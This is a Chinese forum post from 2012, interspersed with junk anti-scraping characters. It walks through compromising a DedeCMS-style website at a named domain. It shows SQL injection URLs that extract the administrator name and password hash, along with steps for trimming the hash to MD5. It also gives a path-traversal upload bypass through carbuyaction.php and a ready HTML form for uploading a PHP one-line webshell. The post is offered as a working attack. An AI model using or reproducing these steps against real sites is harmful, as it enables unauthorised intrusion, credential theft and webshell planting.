①注入漏洞。
1 o: U5 n1 R9 \, l3 H0 m4 c7 ]这站 http://www.political-security.com/9 W8 q* T* o" x/ h
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,$ T4 D- |! W0 Z# _
www.political-security.com/data/mysql_error_trace.inc 爆后台- m2 B3 _/ u @0 N1 n, Q3 X
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
+ Y# E* m2 \5 `7 P7 f- y: f然后写上语句
% ?/ q r4 F. ?0 a查看管理员帐号# b' o5 h. E% ?
http://www.political-security.co ... &membergroup=@`# {! c4 A$ C. m- q" p
/ X% o% ~4 N, |$ ^1 Z/ P: p
admin
: s- V+ _8 G$ w6 F
5 Y( U3 \- Y5 `! G# g! D$ ^查看管理员密码$ y" A( X+ a' w+ P; J
http://www.political-security.co ... &membergroup=@`3 t" D0 b' H2 `, `& Y
: P. u8 _- W! ^/ z8d29b1ef9f8c5a5af429
8 P% }, \4 P0 z# J, T; K2 t: f: V: B0 h' R
查看管理员密码
& e; n$ [& s1 k, Z; v \) `4 q& {' X1 ^9 s' e; c6 F
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5/ u5 p; z1 `6 z0 K: a+ |& Y
3 D. ~# o* V$ j& P: a
8d2
( `6 @. R% w2 G# @9b1ef9f8c5a5af42/ n, U% S- ]' ?9 d; U
9
' g" m- @9 {% ?8 w8 Z
$ O) q0 T- q* {cmd5没解出来 只好测试第二个方法
, Y7 U8 O4 p4 y. B
2 `6 _/ m- [8 g1 F' m- V
+ f2 ]( ~% z/ V# i& ^7 y" G②上传漏洞:
. @; K- z' j. E, r! B5 J6 d0 n U% }" a9 Q0 y! J- b
只要登陆会员中心,然后访问页面链接6 J0 P/ U# S! f) r
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”9 g7 f! i% E' R
6 D. g: x! t6 _' r3 v1 S& ^
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”4 o5 E7 d( V, d J1 I! s7 b: Z+ I
5 T- M$ X" i8 T6 D# W k% ?
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
; Z3 C* y# g2 ~
9 Y/ f8 K& p9 } {" t" a/ ]<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>1 C" k/ F$ b' j. P
或者
, _. i2 o; c3 R- U( C. B8 d即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对